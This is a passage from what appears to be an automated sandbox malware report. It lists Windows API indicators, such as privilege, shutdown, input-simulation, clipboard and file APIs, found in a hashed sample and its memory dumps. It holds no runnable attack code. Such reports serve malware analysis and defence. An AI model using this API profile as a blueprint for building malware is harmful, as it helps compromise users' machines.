\"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"RtlFreeHeap\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CoInitializeEx\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"ProgIDFromCLSID\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CoCreateInstance\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CoInitializeSecurity\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CoUninitialize\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CoTaskMemFree\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"CLSIDFromString\"; File: \"c1576c273b686607e24365ffb26cf93f2e965690f57afba4d4c7585c84365110\")\n Found reference to API (Indicator: \"AddAce\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InitializeAcl\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorControl\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"MakeAbsoluteSD\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorSacl\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorDacl\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorGroup\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSecurityDescriptorOwner\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InitializeSecurityDescriptor\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLengthSid\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"IsValidSid\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CopySid\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetAclInformation\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetSecurityDescriptorOwner\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetSecurityDescriptorGroup\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetSecurityDescriptorDacl\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSidSubAuthority\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InitializeSid\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSidLengthRequired\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"IsValidSecurityDescriptor\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetThreadUILanguage\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"RaiseException\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InterlockedIncrement\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"InterlockedDecrement\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateThread\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateEventW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetEvent\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LocalFree\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"WaitForMultipleObjects\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"OpenEventW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"lstrlenW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"OutputDebugStringW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"DispatchMessageW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"TranslateMessage\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"LoadStringW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CoInitializeSecurity\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoInitializeEx\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoUninitialize\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoTaskMemFree\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"ProgIDFromCLSID\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CoCreateInstance\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CLSIDFromString\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CommandLineToArgvW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"RegCloseKey\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"RegQueryValueExW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"HeapDestroy\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapReAlloc\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapSize\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProcessHeap\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"InterlockedExchange\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"InterlockedCompareExchange\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"OutputDebugStringA\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetUnhandledExceptionFilter\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FormatMessageW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadResource\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FindResourceExW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateFileW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetFullPathNameW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetVersionExW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSystemWindowsDirectoryW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleExW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"UnregisterClassA\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"RegOpenKeyExW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SetLastError\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryExW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"MapViewOfFile\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"CreateFileMappingW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetLocaleInfoW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"UnmapViewOfFile\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetSystemDefaultUILanguage\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetUserDefaultUILanguage\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SearchPathW\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"RtlAllocateHeap\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"RtlFreeHeap\"; Source: \"00000000-00003284.00000000.72407.00BD1000.00000020.mdmp\")\n Found reference to API (Indicator: \"SeShutdownPrivilege\"; Source: \"00000000-00003552.00000000.74426.002F0000.00000004.mdmp, 00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProductInfo\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetNativeSystemInfo\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"ServicesActive\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"NtShutdownSystem\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProcessWindowStation\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetUserObjectInformationA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetActiveWindow\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FindClose\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FindNextFileA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CopyFileA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcatA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcpyA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FindFirstFileA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetFilePointer\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrlenA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcpynA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"DeleteFileA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcmpA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcmpiA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLogicalDriveStringsA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetDriveTypeA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"MoveFileA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EnumResourceNamesA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemInfo\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetThreadPriority\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThread\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeResource\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"UpdateResourceA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SizeofResource\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"LockResource\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FindResourceA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EnumResourceLanguagesA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EndUpdateResourceA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"BeginUpdateResourceA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetVolumeInformationA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetComputerNameA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"OpenMutexA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetPriorityClass\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetErrorMode\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"ExitThread\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTimeFormatA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetDateFormatA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GlobalUnlock\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GlobalLock\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GlobalAlloc\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetFileTime\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemTime\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateProcessA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"wsprintfA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowRect\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetDesktopWindow\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"ShowWindow\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EnableWindow\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetClassNameA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"DestroyWindow\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetWindowPos\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"PostMessageA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowTextA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"IsWindowVisible\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EnumWindows\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"IsWindowEnabled\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"LookupIconIdFromDirectoryEx\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCursorPos\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetCursorPos\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemMetrics\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"ReleaseDC\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowDC\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetClipboardData\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EmptyClipboard\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SendInput\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetFocus\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetForegroundWindow\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetWindowTextA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EnumChildWindows\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowPlacement\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindow\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetClientRect\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"PostQuitMessage\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"DispatchMessageA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetMessageA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"UpdateWindow\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"RegisterClassA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SendMessageTimeoutA\"; Source: \"00000000-00003552.00000000.74426.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"RegisterWindowMessageA\"; Source: 